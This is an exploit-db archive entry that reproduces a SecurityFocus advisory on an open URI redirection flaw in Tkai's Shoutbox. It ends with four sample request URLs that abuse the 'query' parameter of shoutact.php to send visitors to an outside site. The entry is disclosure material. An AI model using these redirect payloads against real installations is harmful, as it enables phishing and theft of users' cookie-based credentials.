exploit-db-mirror/exploits/php/webapps/25299.txt
Offensive Security d304cc3d3e DB: 2017-11-24
116602 new exploits

Too many to list!
2017-11-24 20:56:23 +00:00

15 lines
No EOL
675 B
Text

source: http://www.securityfocus.com/bid/12914/info
Tkai's Shoutbox is reported prone to a remote URI redirection vulnerability.
It is reported that an attacker can exploit this issue by supplying the URI of a malicious site through the 'query' parameter of a link.
A successful attack may result in various attacks including theft of cookie based authentication credentials.
/shoutact.php?yousay=default&query=http://www.example.com
/shoutact.php?yousay=default&name=default&query=http://www.example.com
/shoutact.php?yousay=default&email=default&query=http://www.example.com
/shoutact.php?yousay=default&email=default&name=default&query=www.example.com